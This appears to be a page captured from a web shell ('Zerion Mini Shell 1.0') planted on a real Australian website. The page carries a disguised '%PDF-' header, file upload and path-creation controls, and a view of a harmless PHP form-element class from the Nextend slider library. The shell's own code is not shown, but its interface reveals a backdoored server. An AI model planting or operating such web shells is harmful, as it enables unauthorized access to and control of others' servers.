%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/lightco1/luminero.com.au/libraries/nextend2/nextend/library/libraries/form/element/
Upload File :
Create Path :
Current File : /home/lightco1/luminero.com.au/libraries/nextend2/nextend/library/libraries/form/element/hidden.php

<?php

class N2ElementHidden extends N2Element
{

    public $_mode = 'hidden';

    public $_tooltip = false;

    function fetchTooltip() {
        if ($this->_tooltip) {
            return parent::fetchTooltip();
        } else {
            return $this->fetchNoTooltip();
        }
    }

    function fetchElement() {

        return N2Html::tag('input', array(
            'id'           => $this->_id,
            'name'         => $this->_inputname,
            'value'        => $this->getValue(),
            'type'         => $this->_mode,
            'autocomplete' => 'off'
        ), false);
    }
}

Zerion Mini Shell 1.0